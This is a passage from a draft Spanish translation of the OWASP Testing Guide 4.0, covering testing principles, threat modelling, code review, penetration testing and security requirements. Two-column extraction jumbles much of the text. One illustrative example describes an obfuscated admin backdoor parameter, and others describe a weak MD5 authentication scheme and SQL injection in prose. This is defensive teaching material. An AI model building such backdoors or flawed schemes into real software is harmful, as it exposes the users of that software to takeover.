Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Guia de Pruebas Owasp 4.0 Español PDF
Guia de Pruebas Owasp 4.0 Español PDF
0 "Borrador"
FERNANDO VELA
ROBERTO ANDRADE
QUITO- ECUADOR
Indice
0
Página 6-8
1
Página 9-12
Frontispicio
2
Página 13-37
Introduction
Principios de la prueba
Las pruebas de seguridad integradas al desarrollo y flujos de trabajo de las pruebas de seguridad
3
Página 38-41
Resumen
4
Páginas 42-313
Introducción y objetivos
Recopilación de información
Revision de los meta archivos del servidor web en busca de fugas de información (OTG-INFO-003)
Revisión de los comentarios del sitio web y los metadatos en busca de fujas de información (OTG-INFO-005)
Revisión archivos viejos, copias de seguridad y archivos no referenciados para Información sensible (OTG-CONFIG-004)
Pruebas de autenticación
Pruebas de autorización
Pruebas en Oracle
Pruebas de MySQL
Pruebas para el envío de información sensible por canales sin encriptar (OTG-CRYPST-003)
Prueba del número de veces que limita el uso de una función (OTG-BUSLOGIC-005)
5
Páginas 314-331
Apéndice
Libros Blancos
Libros
Categorías Fuzz
Codificación de entrada
Codificación de salida
0
más importante de nuestro tiempo. El dramático aumento de las
aplicaciones web para negocios, redes sociales, etc. sólo ha
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
7
Guia de pruebas 4.0 "Borrador"
Es obvio que no se puede construir una aplicación segura sin realizar pruebas
de seguridad en la misma. Las pruebas son parte de un enfoque más amplio en
la construcción de un sistema seguro. Muchas organizaciones de desarrollo de
software no incluyen pruebas como parte de su procedimiento estándar de
desarrollo de software. Lo que es peor aún, muchos proveedores de seguridad
entregan pruebas con diversos grados de calidad y rigor.
Crear una guía como esta es una gran tarea que requiere de la experiencia de
En conjunto con otros proyectos de la OWASP como la Guía de Revisión de
cientos de personas alrededor del mundo. Hay muchas maneras diferentes
Códigos, la Guía de Desarrollo y Herramientas como OWASP ZAP, es un
para detectar fallos de seguridad y esta guía captura el consenso de los
gran comienzo para la construcción y mantenimiento de aplicaciones seguras. principales expertos sobre cómo realizar esta prueba con rapidez, exactitud y
La guía de desarrollo mostrará para su proyecto cómo diseñar y construir una eficiencia.OWASP da a personas de seguridad con conocimientos afines la
aplicación segura, la Guía de Revisión de Códigos le dirá cómo verificar la capacidad de trabajar conjuntamente y formar un enfoque de práctica de
seguridad del código de origen de su aplicación, y esta Guía de Pruebas le liderazgo para un problema de seguridad.
mostrará cómo verificar la seguridad de su aplicación en funcionamiento. Yo
recomiendo utilizar estas guías como parte de sus iniciativas para la seguridad
de su aplicación.
La importancia de tener esta guía en forma totalmente libre y abierta es • Los desarrolladores deben usar esta guía para asegurarse de que están
importante para la misión de las fundaciones. Da a cualquiera la capacidad de produciendo códigos seguros. Estas pruebas deben ser parte de los
entender las técnicas usadas para detectar problemas de seguridad comunes. procedimientos normales de los códigos y de la unidad de pruebas.
La seguridad no debe ser un arte oscuro o un secreto cerrado que sólo unos
pocos pueden practicar. Debe estar abierta a todos y no ser exclusiva para los
profesionales en seguridad, sino también para desarrolladores de control de
calidad y gerentes técnicos. El proyecto para la construcción de esta guía • Los evaluadores de software y control de calidad deben usar esta guía para
mantiene la experiencia en manos de la gente que lo necesita; usted, yo y ampliar el conjunto de casos de prueba que emplean en las aplicaciones.
cualquier persona que participa en la construcción de software. Atrapar estas vulnerabilidades tempranamente es un ahorro considerable de
tiempo y esfuerzo más adelante.
Esta guía debe abrirse paso hasta las manos de los desarrolladores y
evaluadores de software. No hay suficientes expertos de seguridad de • Los especialistas en seguridad deben usar esta guía en combinación con
aplicaciones en el mundo para hacer una abolladura significativa en el otras técnicas como una manera de verificar que no se haya escapado algún
problema general. agujero de seguridad en la aplicación.
• Los gerentes de proyectos deben considerar la razón por la que esta guía
existe y que las cuestiones de seguridad se manifiestan mediante errores de
La responsabilidad inicial de seguridad de las aplicaciones debe recaer en los código y diseño.
hombros de los desarrolladores; ellos escriben el código. No debería ser una
sorpresa que los desarrolladores no están produciendo codificación segura si
no la están probando o consideran los tipos de errores que generan la
vulnerabilidad. Lo más importante cuando se realizan pruebas de seguridad es recordar que
se deben priorizar continuamente. Hay un número infinito de posibilidades
para que una aplicación pueda fallar, y las organizaciones siempre han tenido
tiempo y recursos limitados. Asegúrese de que el tiempo y los recursos se
Mantener esta información actualizada es un aspecto crítico de este proyecto utilicen adecuadamente. Trate de concentrarse en los agujeros de seguridad
de guía. Adoptando el enfoque wiki, la comunidad OWASP puede que son un riesgo real para su negocio. Trate de contextualizar el riesgo en
evolucionar y ampliar la información en esta guía para mantener el ritmo con cuanto a la aplicación y sus usos.
el panorama de la veloz amenaza de seguridad a las aplicaciones.
Esta guía se visualiza mejor como un conjunto de técnicas que puede utilizar
para encontrar diferentes tipos de agujeros de seguridad. Pero no todas las
técnicas son igual de importantes. Trate de evitar el uso de la guía como una
Esta guía es un gran testimonio de la pasión y energía que nuestros miembros lista de verificación. Nuevas vulnerabilidades siempre se manifestarán y
y voluntarios del proyecto han dedicado a este tema. Sin duda ayudará a ninguna guía puede ser una lista exhaustiva de "cosas por probar", sino más
cambiar el mundo "una línea de código" a la vez. bien un gran lugar para comenzar.
En general, hay varios roles diferentes que pueden usar esta guía dentro de las
organizaciones:
Lo más importante, estas herramientas son genéricas; lo que significa que no
están diseñadas para un código personalizado, sino para aplicaciones en
general. Eso significa que mientras pueden encontrar algunos problemas de las aplicaciones, pero no es exhaustiva. Si encuentra errores, por favor
genéricos, no tienen suficiente conocimiento de la aplicación para que puedan agregue una nota en la página de discusión o haga el cambio usted mismo.
detectar la mayoría de los errores. En mi experiencia, los más graves Estará ayudando a miles de personas que utilizan esta guía.
problemas de seguridad son los que no son genéricos, sino profundamente
entrelazados en su lógica de negocio y diseño de la aplicación personalizada.
Llamado a la acción
Eoin Keary, Miembro de la Junta Directiva de OWASP, Abri 19, 2013
Con V4 nos dimos cuenta de una nueva guía que será la guía estándar
por defecto para realizar pruebas de Penetración de Aplicaciones
Web. -Matteo Meucci.
Redactar la Guía de Pruebas ha demostrado ser una tarea difícil. Fue un reto Un principio básico de la ingeniería de software es que usted no puede controlar lo
conseguir consenso y desarrollar contenidos que permitan aplicar los conceptos que no se puede medir [1]. Las pruebas de seguridad no son diferentes.
descritos en la guía, permitiendo a la vez que trabajen en su propio entorno y Desafortunadamente, medir la seguridad es un proceso difícil. Este tema no se
cultura. También fue un reto el cambiar el enfoque de las pruebas de pruebas de cubrirá en detalle aquí, ya que tendrá su guía propia (para una introducción, vea
penetración a pruebas integradas en el ciclo de vida de desarrollo de las [2]).
aplicaciones web.
Un aspecto que debe destacarse es que las medidas de seguridad son acerca de las
Sin embargo, el grupo está muy satisfecho con los resultados del proyecto. Muchos cuestiones técnicas específicas (por ejemplo, cómo prevalece una cierta
expertos de la industria y profesionales de seguridad, algunos de los cuales son vulnerabilidad) y cómo estos problemas afectan la economía del software. La
responsables de la seguridad del software en algunas de las empresas más grandes mayoría de personas técnicas comprenderán al menos las cuestiones
del mundo, están validando el marco de la prueba. Este marco ayuda a las fundamentales, o pueden tener una comprensión más profunda de las
organizaciones a probar sus aplicaciones web para crear software confiable y vulnerabilidades. Lamentablemente, pocos son capaces de traducir ese
seguro. El marco no solo resalta las áreas débiles, aunque este último es sin duda un conocimiento técnico en términos monetarios y cuantificar el costo potencial de las
subproducto de muchas de las guías y listas de verificación de OWASP. Así, vulnerabilidades al negocio del propietario de la aplicación. Hasta que esto no
decisiones difíciles tuvieron que tomarse, respecto a la conveniencia de ciertas ocurra, los gerentes de sistemas (CIO) no serán capaces de calcular un retorno
técnicas de prueba y tecnologías de pruebas. El Grupo entiende perfectamente que exacto de inversión en seguridad y, consecuentemente, asignar un presupuesto
no todos estarán de acuerdo con todas estas decisiones. Sin embargo, OWASP es apropiado para la seguridad de las aplicaciones.
capaz de alcanzar otros niveles y cambiar la cultura en el tiempo a través de
sensibilización y educación basadas en el consenso y la experiencia. Mientras que calcular el costo de software inseguro puede parecer una tarea
desalentadora, ha habido una cantidad significativa de trabajo en esta dirección. Por
ejemplo, en junio de 2002, el Instituto Nacional Estadounidense de Estándares
(NIST) publicó una encuesta sobre el costo del software inseguro en la economía
El resto de esta guía está organizado como se indica a continuación: Esta de Estados Unidos, debido a la inadecuada prueba de software [3]. Curiosamente,
introducción cubre los prerrequisitos de las pruebas de aplicaciones web y de su se estima que una mejor infraestructura de pruebas ahorraría más de un tercio de
alcance. También cubre los principios exitosos de pruebas y las técnicas de esos costos, o alrededor de $22 mil millones al año. Más recientemente, los
pruebas. El Capítulo 3 presenta el marco de pruebas de OWASP y explica sus vínculos entre la economía y la seguridad han sido estudiados por investigadores
técnicas y tareas en relación con las distintas fases del ciclo de vida del desarrollo académicos. Vea [4] para más información sobre algunos de estos esfuerzos.
de aplicaciones. El Capítulo 4 cubre cómo comprobar vulnerabilidades específicas
(por ejemplo, inyección de SQL) mediante inspección de código y pruebas de
penetración.
El marco descrito en este documento alienta a las personas a medir la seguridad a
través del proceso completo de desarrollo. Pueden, entonces, relacionar el costo del
software inseguro con el impacto que tiene en el negocio y, en consecuencia,
Para medir la seguridad: la economía del software inseguro desarrollar procesos de negocios adecuados y asignar recursos para manejar el
riesgo. Recuerde que la medición y pruebas de aplicaciones web son incluso más
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
11
Guia de pruebas 4.0 "Borrador"
críticas que otros programas, ya que las aplicaciones web están expuestas a La mayoría de la gente, hoy en día, no prueba el software hasta que ya ha sido
millones de usuarios a través de Internet. creado y está en la fase de despliegue de su ciclo de vida (es decir, el código ha sido
creado y utilizado en una aplicación web activa). Esto suele ser una práctica muy
ineficaz y con un costo prohibitivo. Uno de los mejores métodos para impedir que
haya fallos de seguridad que aparecen en aplicaciones en producción es mejorar el
¿Qué es probar? Ciclo de Vida de Desarrollo de Software (SDLC), incluyendo seguridades en cada
una de sus fases. Un SDLC es una estructura impuesta sobre el desarrollo de
Durante el ciclo de vida de desarrollo de una aplicación web necesitan probarse artefactos de software. Si un SDLC actualmente no está siendo utilizando en su
muchas cosas, pero ¿qué significa realmente probar? El diccionario Merriam- entorno, ¡es hora de elegir uno! La siguiente figura muestra un modelo SDLC
Webster describe como: genérico, así como el costo creciente (estimado) de corrección de fallas de
seguridad en este modelo.
Este documento está diseñado para ayudar a las organizaciones a entender lo que
comprende un programa de pruebas y para ayudarles a identificar los pasos que
deben realizarse para construir y operar un programa de pruebas en aplicaciones
web. La guía ofrece una amplia visión de los elementos necesarios para hacer un
programa comprensible de seguridad para aplicaciones web. Esta guía puede
utilizarse como una guía de referencia y metodología para ayudar a determinar la
brecha entre las prácticas existentes y las mejores prácticas de la industria. Esta
guía permite a las organizaciones compararse con colegas del sector, para
comprender la magnitud de los recursos necesarios para probar y mantener el
software, o para prepararse para una auditoría. Este capítulo no entra en los detalles
Las empresas deben inspeccionar su SDLC para garantizar que la seguridad es
parte integral del proceso de desarrollo. Los SDLC deben incluir pruebas de
seguridad para garantizar que esta esté adecuadamente cubierta y los controles sean
eficaces durante todo el proceso de desarrollo.
Proceso – para asegurar que hay criterios y políticas adecuadas y que las No hay una bala de plata
A menos que se adopte un enfoque integral, sólo probar la aplicación técnica de Pensar estratégicamente, no tácticamente
una aplicación no destapará la gestión o vulnerabilidades operacionales que podrían
estar presentes. Probando a las personas, políticas y procesos, una organización En los últimos años, los profesionales de la seguridad se han dado cuenta de la
puede encontrar temas que después se manifiesten en defectos en la tecnología, así falacia del modelo de remendar y penetrar que fue dominante en la seguridad de la
como erradicar errores tempranamente e identificar la causa de los defectos. información durante la década de 1990. El modelo de remendar y penetrar implica
Además, sólo probando algunas de las cuestiones técnicas que pueden estar corregir un error reportado, pero sin una investigación adecuada de la causa inicial.
presentes en un sistema resultará en una evaluación de seguridad incompleta e Este modelo se asocia generalmente a la ventana de vulnerabilidad que se muestra
inexacta. en la figura siguiente. La evolución de las vulnerabilidades en software común
utilizado en todo el mundo ha demostrado la ineficacia de este modelo. Para
obtener más información acerca de la ventana de la vulnerabilidad, consulte [6].
y sugerencias. Especialmente nos gusta saber que nuestro trabajo está siendo
utilizado y que es eficaz y preciso.
Figura 2: Ventana de vulnerabilidad
Hay algunos errores comunes al desarrollar una metodología de pruebas para
encontrar las fallas de seguridad en el software. Este capítulo cubre algunos de los
principios básicos que los profesionales deben tomar en cuenta al realizar pruebas
de seguridad en el software.
Hay varios marcos seguros de SDLC que ofrecen consejos tanto descriptivos como
prescriptivos. Si una persona toma el consejo descriptivo o preceptivo, depende de
la madurez del proceso de SDLC. Esencialmente, el asesoramiento prescriptivo
muestra cómo debe trabajar el SDLC seguro y el asesoramiento descriptivo
muestra cómo debe usarse en el mundo real. Ambos tienen su lugar.
Por ejemplo, si no sabe por dónde empezar, un marco prescriptivo puede herramientas automatizadas son realmente malas al realizar pruebas de
proporcionar un menú de controles de seguridad potenciales que pueden aplicarse vulnerabilidad automáticamente es que este pensamiento creativo debe hacerse
en el SDLC. El asesoramiento descriptivo puede entonces impulsar el proceso de caso por caso, ya que la mayoría de las aplicaciones web se desarrollan de una
decisión mediante la presentación de lo que ha funcionado bien para otras manera única (aun cuando usen marcos comunes).
organizaciones. SDLC descriptivos seguros son BSIMM-V, y SDLC prescriptivos
seguros incluyen el Software Abierto de Modelo de Garantía de Madurez de
OWASP (OpenSAMM) y el ISO/IEC 27034, partes 1-8, segmentos del cual
todavía están en desarrollo. Entender el tema
constantemente y los desarrolladores deben ser conscientes de las amenazas que Aunque ya hemos indicado que no hay ninguna herramienta perfecta, las
afectan al software que están desarrollando. La educación en pruebas de seguridad herramientas juegan un papel crítico en el programa general de seguridad. Hay una
también ayuda a los desarrolladores a adquirir la mentalidad apropiada para probar gama de herramientas de código abierto y herramientas comerciales que pueden
una aplicación desde la perspectiva de un atacante. Esto permite a cada automatizar muchas tareas rutinarias de seguridad. Estas herramientas pueden
organización considerar los problemas de seguridad como parte de sus simplificar y acelerar el proceso de seguridad al ayudar al personal de seguridad en
responsabilidades actuales. sus tareas. Sin embargo, es importante entender exactamente lo que estas
herramientas pueden y no pueden hacer para que no se sobrevaloren o se utilicen
incorrectamente.
Es importante saber cuánta seguridad requerirá un proyecto. La información y los El Diablo se encuentra en los detalles
activos que deben ser protegidos deberán tener una clasificación que establezca
cómo deben ser manejados (por ejemplo, confidencial, secreto, ultra secreto). Las Es fundamental no realizar una revisión superficial de la seguridad de una
discusiones deben llevarse a cabo con consejo legal para asegurarse de que se aplicación y considerarla completa. Esto generará una falsa sensación de confianza
cumplan los requisitos de seguridad específicos. En E.E.U.U., los requisitos que puede ser tan peligrosa como el no haber hecho una revisión de seguridad
podrían venir de regulaciones federales, como la ley de Gramm-Leach-Bliley [8], o desde un inicio. Es vital revisar los hallazgos y descartar
de las leyes estatales, como la ley de California SB-1386 [9]. Para organizaciones
con sede en países de la UE, tanto los reglamentos del país como las directivas de
la UE pueden aplicar. Por ejemplo, la Directiva 96/46/EC4 [10] que obliga a tratar
los datos personales con el debido cuidado, cualquiera que sea la aplicación. cualquier falso positivo que pueda haber en el informe. Reportar un hallazgo de
seguridad incorrecto a menudo puede minar la validez del resto del informe de
seguridad. Debe tener cuidado de verificar que cada sección de la lógica de la
aplicación ha sido probada, y que cada escenario de casos de usos fue explorado
Desarrollar la mentalidad correcta para encontrar posibles vulnerabilidades.
disponible, debería entregarse al personal de seguridad para ayudar a realizar su Utilizar una plantilla de informe de pruebas de seguridad puede ahorrar
revisión. Es posible descubrir vulnerabilidades dentro de la fuente de la aplicación tiempo y asegurar que los resultados sean documentados con precisión y
que pasaron desapercibidas con la prueba de la Caja Negra. consistencia y estén en un formato adecuado para el grupo objetivo.
Desarrollar métricas
• Modelado de Amenazas
Las métricas constantes que se pueden generar de manera automatizada desde
el código fuente disponible también ayudarán a la organización en la
• Revisión de Código
evaluación de la efectividad de los mecanismos creados para reducir los fallos
de seguridad en el desarrollo de software. Las métricas no se desarrollan
• Pruebas de Penetración
fácilmente, así que usar métricas estándar como las previstas por el proyecto
de métricas OWASP y otras organizaciones es un buen punto de partida.
Como con muchas cosas en la vida, al realizar inspecciones manuales y Para desarrollar un modelo de amenazas, se recomienda adoptar un enfoque
revisiones, es recomendable adoptar un modelo de "confíe pero verifique". No simple que sigue el estándar NIST 800-30 [11] de evaluación del riesgo. Este
todo lo que el evaluador muestre o diga será preciso. enfoque implica:
Ventajas:
Creación de modelos de amenazas
• Vista práctica del sistema desde el punto de vista del atacante.
Resumen • Flexible
La creación de modelos de amenazas se ha convertido en una técnica popular • Se inicia temprano en el SDLC.
para ayudar a los diseñadores de sistemas a pensar sobre las amenazas de
seguridad que podrían enfrentar sus sistemas y aplicaciones. Por lo tanto, la
creación de modelos de amenazas puede verse como la evaluación de riesgo
para las aplicaciones. De hecho, permite al diseñador desarrollar estrategias de Desventajas:
mitigación para las vulnerabilidades potenciales y les ayuda a focalizar su
inevitable escasez de recursos y atención en las partes del sistema que más lo • Técnica relativamente nueva.
requiere. Se recomienda que todas las aplicaciones tengan un modelaje de
amenazas desarrollado y documentado. Los modelos de amenazas deben • Buenos modelos de amenazas no significan automáticamente buenas
crearse lo antes posible en el SDLC y deben ser revisados mientras evoluciona aplicaciones.
la aplicación y el desarrollo progresa.
Las pruebas de penetración han sido, por muchos años, una técnica común
utilizada para probar la seguridad de la red. También se las conoce
comúnmente como pruebas de Caja Negra o piratería (hacking) ética. Las
Muchos problemas de seguridad no intencionales, pero significativos, son
pruebas de penetración son esencialmente el "arte" de probar una aplicación
también extremadamente difíciles de descubrir mediante otras formas de
en ejecución remotamente para encontrar vulnerabilidades de seguridad, sin
análisis o pruebas, como las pruebas de penetración; hacen del análisis de
saber el funcionamiento interno de la aplicación. Por lo general, el equipo de
código fuente la técnica elegida para la prueba técnica. Con el código fuente,
pruebas de penetración tendría acceso a una aplicación como si fuera usuario.
un evaluador puede determinar con precisión lo que está sucediendo (o se
El evaluador actúa como un intruso e intenta encontrar y explotar
supone que sucede) y eliminar la conjetura de la prueba de Caja Negra.
vulnerabilidades. En muchos casos, al evaluador se le dará una cuenta válida
en el sistema.
Ventajas:
Muchas personas utilizan hoy en día las pruebas de penetración como su
• Finalización y efectividad.
técnica de pruebas de seguridad primaria. Aunque ciertamente tiene su lugar en
un programa de pruebas, no creemos que debe ser considerada como la técnica
• Precisión.
principal o la única. Gary McGraw en [14] resumió bien a las pruebas de
• Es rápida (para correctores competentes). penetración cuando dijo: "Si fallas una prueba de penetración, sabes que tienes
un problema muy malo en verdad. Si pasas una prueba de penetración, no sabes
si tienes un problema muy malo". Sin embargo, las pruebas de penetración
focalizadas (es decir, pruebas que buscan explotar vulnerabilidades conocidas
Desventajas: y detectadas en revisiones anteriores) pueden ser útiles en la detección si
realmente se arreglan algunas vulnerabilidades específicas en el código desafíen todos los supuestos, tales como el no acceso al código fuente y el explorar
desplegado en el sitio web. la posibilidad de realizar pruebas más completas.
Aunque es claro que no existe una técnica única que pueda realizarse para cubrir
eficientemente todas las pruebas de seguridad y asegurarse de que todos los temas En la siguiente figura se muestra una típica representación proporcional
sobrepuesta a las pruebas técnicas.
han sido abordados, muchas empresas adoptan sólo una aproximación. El enfoque
utilizado ha sido históricamente pruebas de penetración. Las pruebas de
penetración, aunque útiles, no pueden abordar eficazmente muchos de los temas
que deben analizarse. Simplemente es "muy poco y muy tarde" en el ciclo de vida
del desarrollo de software (SDLC). Figura 4: Proporción de prueba de esfuerzo según prueba técnica
Por supuesto, hay momentos y circunstancias donde solo es posible usar una
técnica. Por ejemplo, una prueba en una aplicación web que ya ha sido creada, pero
donde el grupo de pruebas no tiene acceso al código fuente. En este caso, las
pruebas de penetración son claramente mejores que no hacer ninguna prueba en
absoluto. Sin embargo, se recomienda que las personas encargadas de la prueba
Una nota acerca de los escáneres de aplicaciones Web:
Muchas organizaciones han empezado a utilizar escáneres de aplicaciones web Mirando el código, la vulnerabilidad prácticamente salta de la página como un
automatizados. Aunque sin duda tienen su lugar en un programa de pruebas, problema potencial.
algunos temas fundamentales deben ser resaltados porque se cree que las pruebas
de Caja Negra automatizadas no son (o serán algún día) eficaces. Sin embargo,
destacar estos temas no debería desalentar el uso de los escáneres de aplicación
web. Por el contrario, el objetivo es asegurar que se entienden las limitaciones y, Ejemplo 2: Mala criptografía
así, los marcos de pruebas se planeen adecuadamente.
La criptografía es ampliamente utilizada en aplicaciones web. Imagine que un
desarrollador decidió escribir un algoritmo de criptografía simple para autenticar un
usuario desde el sitio A al sitio B automáticamente. En su sabiduría, el
Importante: OWASP actualmente está trabajando para desarrollar una plataforma desarrollador decide que si un usuario está conectado en el sitio A, entonces
de escaneo mediante una evaluación comparativa. Los ejemplos siguientes generará una clave utilizando una función de hash MD5 que comprende: Hash
muestran por qué las pruebas automatizadas de Caja Negra son ineficaces. {username: fecha}.
'Ejemplo 1: Los parámetros mágicos' Cuando un usuario se pasa al sitio B, él o ella le enviará la clave en la cadena de
consulta al sitio B en el re direccionamiento HTTP. El sitio B independientemente
Imagine una aplicación web simple que acepte un par nombre-valor de "magia" y calcula el valor hash y compara con el hash pasado en la petición. Si coinciden, el
luego el valor. Para simplificar, la solicitud GET puede ser: sitio B autentica al usuario como dice ser.
http://www.host/application?magic=value Al explicar el esquema, las deficiencias pueden trabajarse. Cualquiera que entienda
el esquema (o se le diga cómo funciona, o descargue la información de Bugtraq)
Para simplificar más el ejemplo, los valores en este caso solo pueden ser caracteres puede iniciar una sesión como cualquier usuario.
ASCII a-z (mayúsculas o minúsculas) y números enteros 0 – 9.
La inspección manual, como una revisión o inspección de código, habría
descubierto rápidamente este problema de seguridad. Un escáner de aplicaciones
web de Caja Negra no habría descubierto la vulnerabilidad. Habría visto un hash de
Los diseñadores de esta aplicación crearon una puerta trasera de administración 128 bits que cambia con cada usuario, y por la naturaleza de las funciones hash, no
durante la prueba, pero la ofuscaron para evitar que un observador casual pueda cambió en una manera predecible.
descubrirla. Enviando el valor sf8g7sfjdsurtsdieerwqredsgnfg8d (31 caracteres), el
usuario, entonces, se conectará y tendrá una pantalla administrativa con el control Una nota sobre las herramientas de revisión de códigos fuente estáticas:
total de la aplicación. La solicitud HTTP es ahora:
Muchas organizaciones han comenzado a usar escáneres estáticos de códigos
http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d fuente. Aunque, sin duda, tienen un lugar en un programa de pruebas
comprehensivo, es necesario resaltar algunas cuestiones fundamentales acerca de
por qué este enfoque no es eficaz cuando se utiliza solo. El análisis de código
fuente estático no puede identificar los problemas debidos a fallas en el diseño, ya
Dado que todos los otros parámetros fueron campos simples de dos y tres que no puede entender el
caracteres, no es posible adivinar combinaciones de aproximadamente 28
caracteres. Se necesitaría la fuerza bruta de un escáner de aplicaciones web (o
adivinar) para encontrar todo el espacio de clave de 30 caracteres. Que es hasta 30 ^
28 permutaciones, o trillones de peticiones HTTP. Esto es un electrón en un pajar contexto en el que se construye el código. Las herramientas de análisis de código
digital. fuente son útiles en la determinación de problemas de seguridad debido a errores de
codificación; sin embargo, se requiere un esfuerzo manual significativo para validar
los resultados.
seguridad conducen efectivamente las pruebas de seguridad durante el SDLC y Otra sección de la lista de verificación debe cumplir con los requisitos generales
cómo se pueden utilizar los datos de pruebas de seguridad para gestionar para el cumplimiento de las políticas y normas de seguridad de información de la
eficazmente los riesgos de seguridad de software. organización. Desde la perspectiva de los requisitos funcionales, los requisitos para
el control de seguridad deben guiar a una sección específica de las normas de
seguridad de la información. Un ejemplo de tal requisito puede ser: "la complejidad
de la contraseña de seis caracteres alfanuméricos debe aplicarse por los controles de
Objetivos de realizar pruebas autenticación utilizados por la aplicación". Cuando los requisitos de seguridad
apuntan hacia normas que deben ser cumplidas, una prueba de seguridad puede
Uno de los objetivos de las pruebas de seguridad es validar que los controles de validar la exposición de riesgos de cumplimiento. Si se encuentra una violación a
seguridad funcionan como se espera. Esto se documenta por medio de requisitos de las políticas y normas de seguridad de la información, ésta resultará en un riesgo
seguridad que describen la funcionalidad del control de seguridad. En un nivel alto, que puede ser documentado y que la empresa tiene que gestionar. Puesto que estos
esto significa comprobar la confidencialidad, integridad y disponibilidad de los requisitos de seguridad son exigibles, estos deben estar bien documentados y
datos, así como el servicio. El otro objetivo es validar que los controles de validados con pruebas de seguridad.
seguridad se implementen con pocas o ninguna vulnerabilidad. Hay
vulnerabilidades comunes, tales como el OWASP Top Ten, así como las
vulnerabilidades que se han identificado previamente en evaluaciones de seguridad
durante el SDLC, como modelaje de amenazas, análisis de código fuente y prueba Validación de requisitos de seguridad
de penetración.
Desde la perspectiva de funcionalidad, la validación de requisitos de seguridad
Documentación de requisitos de seguridad es el principal objetivo de las pruebas de seguridad. Desde la perspectiva de la
gestión de riesgo, la validación de requisitos de seguridad es el objetivo de las
El primer paso en la documentación de requisitos de seguridad es entender los evaluaciones de seguridad de información. En un nivel alto, el principal objetivo
requerimientos del negocio. Un documento de requisitos del negocio puede de las evaluaciones de seguridad de información es la identificación de grietas en
proporcionar información inicial de alto nivel sobre la funcionalidad esperada de la los controles de seguridad, tales como la falta de controles básicos de
aplicación. Por ejemplo, el propósito principal de una aplicación puede ser autenticación, autorización o controles de encriptado. Más a profundidad, el
proporcionar servicios financieros a clientes o permitir adquirir bienes de un objetivo de la evaluación de seguridad es el análisis de riesgo, tal como la
catálogo en línea. Una sección de seguridad de los requerimientos del negocio debe identificación de las debilidades potenciales en los controles de seguridad que
resaltar la necesidad de proteger los datos del cliente, así como cumplir con la garanticen la confidencialidad, integridad y disponibilidad de los datos. Por
documentación de seguridad aplicable, tal como regulaciones, estándares y ejemplo, cuando la aplicación trata con información personal identificable (PII)
políticas. y datos sensibles, el requisito de seguridad a validar es el cumplimiento de las
políticas de seguridad de la empresa en cuanto al encriptado de la información
de dichos datos tanto en tránsito como en almacenamiento.
Una lista general de las regulaciones, estándares y políticas es un buen análisis de Asumiendo que el cifrado se utiliza para proteger los datos, los algoritmos de
cumplimiento de seguridad preliminar para las aplicaciones web. Por ejemplo, el cifrado y longitud de claves deben cumplir con los estándares de encriptación de
cumplimiento de las reglamentaciones puede identificarse revisando información la organización. Estos pueden requerir que solo se utilice ciertos algoritmos y
del sector empresarial y del país o estado donde funcionará la aplicación. Algunas longitudes de clave. Por ejemplo, un requisito de seguridad que puede ser
de estas normas y directrices de cumplimiento podrían traducirse en requerimientos probado es verificar que se utilizan sólo códigos permitidos (por ejemplo, SHA-
técnicos específicos para controles de seguridad. Por ejemplo, en el caso de 256, RSA, AES) con longitud de claves mínimas permitidas (por ejemplo, más
aplicaciones financieras, el cumplimiento de las pautas de la FFIEC para de 128 bits para encriptado simétrico y de más de 1024 para encriptado
autenticación [15] requiere que las instituciones financieras implementen asimétrico).
aplicaciones que mitiguen los riesgos de autenticación débil con autenticación de
múltiples etapas y control de seguridad multifactorial.
posible derivar mejor los casos de prueba de seguridad y aumentar el nivel de una función hash para cifrar una contraseña, sin la aplicación de una semilla en
protección de los requisitos de seguridad. Por ejemplo, distinguir las verdaderas el valor. Desde la perspectiva de codificación segura, se trata de una
vulnerabilidades de los no-explotables es posible cuando se combinan los vulnerabilidad que afecta a la encriptación usada para la autenticación con una
resultados de pruebas de penetración y análisis de código fuente. Considerando vulnerabilidad cuya causa está en el error de codificación. Puesto que la causa es
la prueba de seguridad para una vulnerabilidad de inyección de un S L, por una codificación insegura, el requisito de seguridad puede ser documentado en
ejemplo una prueba de Caja Negra,en primer lugar, podría involucrar un análisis las normas de codificación seguras y validado a través de revisiones de código
de la aplicación para identificar la vulnerabilidad. La primera evidencia de una seguro durante la fase de desarrollo de la SDLC.
potencial vulnerabilidad de inyección de una SQL que puede ser validada es la
generación de una excepción de la SQL. Una
validación posterior de la vulnerabilidad de la SQL puede implicar inyectar Los requerimientos de seguridad deben tomar en cuenta la gravedad de las
manualmente vectores de ataque para modificar la gramática de la consulta SQL vulnerabilidades para apoyar una estrategia de mitigación de riesgo. Asumiendo
para explotar la divulgación de la información. Esto podría involucrar una gran que la organización mantiene un registro de vulnerabilidades en aplicaciones (es
cantidad de análisis de ensayo y error hasta que la consulta dañina se ejecute. decir, una base de conocimiento de vulnerabilidades), los temas de seguridad
Suponiendo que el evaluador tenga el código fuente, ella puede aprender a partir pueden ser reportados por tema, tipo, causa principal, mitigación y direccionados
del análisis de código fuente, como construir el vector de ataque de la SQL que a las aplicaciones donde se encuentran. Tal base de conocimiento de
puede explotar la vulnerabilidad (por ejemplo, ejecutar una consulta maliciosa vulnerabilidades también puede utilizarse para establecer métricas para analizar
que devuelve datos confidenciales a un usuario no autorizado). la eficacia de las pruebas de seguridad en el SDLC.
La clasificación de amenazas y defensas, que considera la raíz de las Por ejemplo, considere un problema de validación de entrada, como una
vulnerabilidades, es el factor crítico en la verificación de que los controles de inyección de SQL, que se identificó a través del análisis del código fuente y
seguridad sean diseñados, codificados y construidos para mitigar el impacto de registrado con una causa principal de error de codificación y tipo, una
la exposición de esas vulnerabilidades. En el caso de las aplicaciones web, la vulnerabilidad de validación de entrada. La exposición de esta vulnerabilidad
exposición de los controles de seguridad para vulnerabilidades comunes, tales puede ser evaluada mediante una prueba de penetración, mediante el análisis de
como el OWASP Top Ten, puede ser un buen punto de partida para derivar los campos de entrada con varios vectores de ataque de inyección de SQL. Esta
requisitos generales de seguridad. Más concretamente, el framework de prueba puede validar que los caracteres especiales son filtrados antes de llegar a
seguridad de aplicaciones web [17] proporciona una clasificación (por ejemplo la base de datos y mitigan la vulnerabilidad. Combinando los resultados del
taxonomía) de vulnerabilidades que pueden ser documentadas en diferentes análisis de código fuente y pruebas de penetración es posible determinar la
guías y estándares diferentes y validados con pruebas de seguridad. probabilidad y la exposición a la vulnerabilidad y calcular la calificación de
riesgo de la vulnerabilidad. Informando las calificaciones de riesgo de
vulnerabilidad en los resultados (por ejemplo, informe de pruebas) es posible
